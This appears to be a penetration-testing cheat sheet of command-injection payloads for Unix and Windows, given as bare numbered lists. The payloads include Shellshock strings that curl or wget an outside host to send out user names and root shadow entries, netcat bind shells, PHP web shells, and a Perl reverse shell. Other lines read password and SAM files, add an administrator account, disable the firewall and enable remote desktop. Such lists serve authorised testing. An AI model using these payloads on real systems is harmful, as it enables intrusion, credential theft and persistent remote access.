pwny.cc
Search…
Command Injection

Unix

1
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
2
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
3
<!--#exec%20cmd="/usr/bin/id;-->
4
<!--#exec%20cmd="/usr/bin/id;-->
5
/index.html|id|
6
;id;
7
;id
8
;netstat -a;
9
;system('cat%20/etc/passwd')
10
;id;
11
|id
12
|/usr/bin/id
13
|id|
14
|/usr/bin/id|
15
||/usr/bin/id|
16
|id;
17
||/usr/bin/id;
18
;id|
19
;|/usr/bin/id|
20
\n/bin/ls -al\n
21
\n/usr/bin/id\n
22
\nid\n
23
\n/usr/bin/id;
24
\nid;
25
\n/usr/bin/id|
26
\nid|
27
;/usr/bin/id\n
28
;id\n
29
|usr/bin/id\n
30
|nid\n
31
`id`
32
`/usr/bin/id`
33
a);id
34
a;id
35
a);id;
36
a;id;
37
a);id|
38
a;id|
39
a)|id
40
a|id
41
a)|id;
42
a|id
43
|/bin/ls -al
44
a);/usr/bin/id
45
a;/usr/bin/id
46
a);/usr/bin/id;
47
a;/usr/bin/id;
48
a);/usr/bin/id|
49
a;/usr/bin/id|
50
a)|/usr/bin/id
51
a|/usr/bin/id
52
a)|/usr/bin/id;
53
a|/usr/bin/id
54
;system('cat%20/etc/passwd')
55
;system('id')
56
;system('/usr/bin/id')
57
%0Acat%20/etc/passwd
58
%0A/usr/bin/id
59
%0Aid
60
%0A/usr/bin/id%0A
61
%0Aid%0A
62
& ping -i 30 127.0.0.1 &
63
& ping -n 30 127.0.0.1 &
64
%0a ping -i 30 127.0.0.1 %0a
65
`ping 127.0.0.1`
66
| id
67
& id
68
; id
69
%0a id %0a
70
`id`
71
$;/usr/bin/id
72
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"
73
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"
74
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
75
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`"
76
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
77
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
78
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"
79
() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"
80
() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
81
() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"
82
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
83
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"
84
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"
85
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
86
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`"
87
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`"
88
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
89
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`"
90
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
91
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"
92
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"
93
cat /etc/hosts
94
$(`cat /etc/passwd`)
95
cat /etc/passwd
96
%0Acat%20/etc/passwd
97
{{ get_user_file("/etc/passwd") }}
98
<!--#exec cmd="/bin/cat /etc/passwd"-->
99
<!--#exec cmd="/bin/cat /etc/shadow"-->
100
<!--#exec cmd="/usr/bin/id;-->
101
system('cat /etc/passwd');
102
<?php system("cat /etc/passwd");?>
Copied!

Windows

1
`
2
||
3
|
4
;
5
'
6
'"
7
"
8
"'
9
&
10
&&
11
%0a
12
%0a%0d
13
%0a ping -i 30 127.0.0.1 %0a
14
%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
15
%20{${phpinfo()}}
16
%20{${sleep(20)}}
17
%20{${sleep(3)}}
18
() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12
19
| curl http://crowdshield.com/.testing/rce.txt
20
& curl http://crowdshield.com/.testing/rce.txt
21
; curl https://crowdshield.com/.testing/rce_vuln.txt
22
&& curl https://crowdshield.com/.testing/rce_vuln.txt
23
curl https://crowdshield.com/.testing/rce_vuln.txt
24
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
25
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
26
$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
27
dir
28
| dir
29
; dir
30
$(`dir`)
31
& dir
32
&&dir
33
&& dir
34
| dir C:\
35
; dir C:\
36
& dir C:\
37
&& dir C:\
38
dir C:\
39
| dir C:\Documents and Settings\*
40
; dir C:\Documents and Settings\*
41
& dir C:\Documents and Settings\*
42
&& dir C:\Documents and Settings\*
43
dir C:\Documents and Settings\*
44
| dir C:\Users
45
; dir C:\Users
46
& dir C:\Users
47
&& dir C:\Users
48
dir C:\Users
49
;echo%20'<script>alert(1)</script>'
50
echo '<img src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)></img>'// XXXXXXXXXXX
51
| echo "<?php include($_GET['page'])| ?>" > rfi.php
52
; echo "<?php include($_GET['page']); ?>" > rfi.php
53
& echo "<?php include($_GET['page']); ?>" > rfi.php
54
&& echo "<?php include($_GET['page']); ?>" > rfi.php
55
echo "<?php include($_GET['page']); ?>" > rfi.php
56
| echo "<?php system('dir $_GET['dir']')| ?>" > dir.php
57
; echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
58
& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
59
&& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
60
echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
61
| echo "<?php system($_GET['cmd'])| ?>" > cmd.php
62
; echo "<?php system($_GET['cmd']); ?>" > cmd.php
63
& echo "<?php system($_GET['cmd']); ?>" > cmd.php
64
&& echo "<?php system($_GET['cmd']); ?>" > cmd.php
65
echo "<?php system($_GET['cmd']); ?>" > cmd.php
66
;echo '<script>alert(1)</script>'
67
echo '<script>alert(1)</script>'// XXXXXXXXXXX
68
echo '<script src=https://crowdshield.com/.testing/xss.js></script>'// XXXXXXXXXXX
69
| echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
70
; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
71
& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
72
&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
73
echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
74
() { :;}; echo vulnerable 10
75
eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
76
eval('ls')
77
eval('pwd')
78
eval('pwd');
79
eval('sleep 5')
80
eval('sleep 5');
81
eval('whoami')
82
eval('whoami');
83
exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
84
exec('ls')
85
exec('pwd')
86
exec('pwd');
87
exec('sleep 5')
88
exec('sleep 5');
89
exec('whoami')
90
exec('whoami');
91
;{$_GET["cmd"]}
92
/index.html|id|
93
ipconfig
94
| ipconfig /all
95
; ipconfig /all
96
& ipconfig /all
97
&& ipconfig /all
98
ipconfig /all
99
\n
100
| net localgroup Administrators hacker /ADD
101
; net localgroup Administrators hacker /ADD
102
& net localgroup Administrators hacker /ADD
103
&& net localgroup Administrators hacker /ADD
104
net localgroup Administrators hacker /ADD
105
| netsh firewall set opmode disable
106
; netsh firewall set opmode disable
107
& netsh firewall set opmode disable
108
&& netsh firewall set opmode disable
109
netsh firewall set opmode disable
110
netstat
111
;netstat -a;
112
| netstat -an
113
; netstat -an
114
& netstat -an
115
&& netstat -an
116
netstat -an
117
| net user hacker Password1 /ADD
118
; net user hacker Password1 /ADD
119
& net user hacker Password1 /ADD
120
&& net user hacker Password1 /ADD
121
net user hacker Password1 /ADD
122
| net view
123
; net view
124
& net view
125
&& net view
126
net view
127
`ping 127.0.0.1`
128
& ping -i 30 127.0.0.1 &
129
& ping -n 30 127.0.0.1 &
130
;${@print(md5(RCEVulnerable))};
131
${@print("RCEVulnerable")}
132
${@print(system($_SERVER['HTTP_USER_AGENT']))}
133
pwd
134
| pwd
135
; pwd
136
& pwd
137
&& pwd
138
\r
139
| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
140
; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
141
& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
142
&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
143
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
144
\r\n
145
route
146
| sleep 1
147
; sleep 1
148
& sleep 1
149
&& sleep 1
150
sleep 1
151
|| sleep 10
152
| sleep 10
153
; sleep 10
154
{${sleep(10)}}
155
& sleep 10
156
&& sleep 10
157
sleep 10
158
|| sleep 15
159
| sleep 15
160
; sleep 15
161
& sleep 15
162
&& sleep 15
163
{${sleep(20)}}
164
{${sleep(20)}}
165
{${sleep(3)}}
166
{${sleep(3)}}
167
| sleep 5
168
; sleep 5
169
& sleep 5
170
&& sleep 5
171
sleep 5
172
{${sleep(hexdec(dechex(20)))}}
173
{${sleep(hexdec(dechex(20)))}}
174
sysinfo
175
| sysinfo
176
; sysinfo
177
& sysinfo
178
&& sysinfo
179
systeminfo
180
| systeminfo
181
; systeminfo
182
& systeminfo
183
&& systeminfo
184
$(`type C:\boot.ini`)
185
&&type C:\\boot.ini
186
| type C:\Windows\repair\SAM
187
; type C:\Windows\repair\SAM
188
& type C:\Windows\repair\SAM
189
&& type C:\Windows\repair\SAM
190
type C:\Windows\repair\SAM
191
| type C:\Windows\repair\SYSTEM
192
; type C:\Windows\repair\SYSTEM
193
& type C:\Windows\repair\SYSTEM
194
&& type C:\Windows\repair\SYSTEM
195
type C:\Windows\repair\SYSTEM
196
| type C:\WINNT\repair\SAM
197
; type C:\WINNT\repair\SAM
198
& type C:\WINNT\repair\SAM
199
&& type C:\WINNT\repair\SAM
200
type C:\WINNT\repair\SAM
201
type C:\WINNT\repair\SYSTEM
202
| type %SYSTEMROOT%\repair\SAM
203
; type %SYSTEMROOT%\repair\SAM
204
& type %SYSTEMROOT%\repair\SAM
205
&& type %SYSTEMROOT%\repair\SAM
206
type %SYSTEMROOT%\repair\SAM
207
| type %SYSTEMROOT%\repair\SYSTEM
208
; type %SYSTEMROOT%\repair\SYSTEM
209
& type %SYSTEMROOT%\repair\SYSTEM
210
&& type %SYSTEMROOT%\repair\SYSTEM
211
type %SYSTEMROOT%\repair\SYSTEM
212
whoami
213
| whoami
214
; whoami
215
' whoami
216
' || whoami
217
' & whoami
218
' && whoami
219
'; whoami
220
" whoami
221
" || whoami
222
" | whoami
223
" & whoami
224
" && whoami
225
"; whoami
226
$(`whoami`)
227
& whoami
228
&& whoami
Copied!
Copy link
Contents
Unix
Windows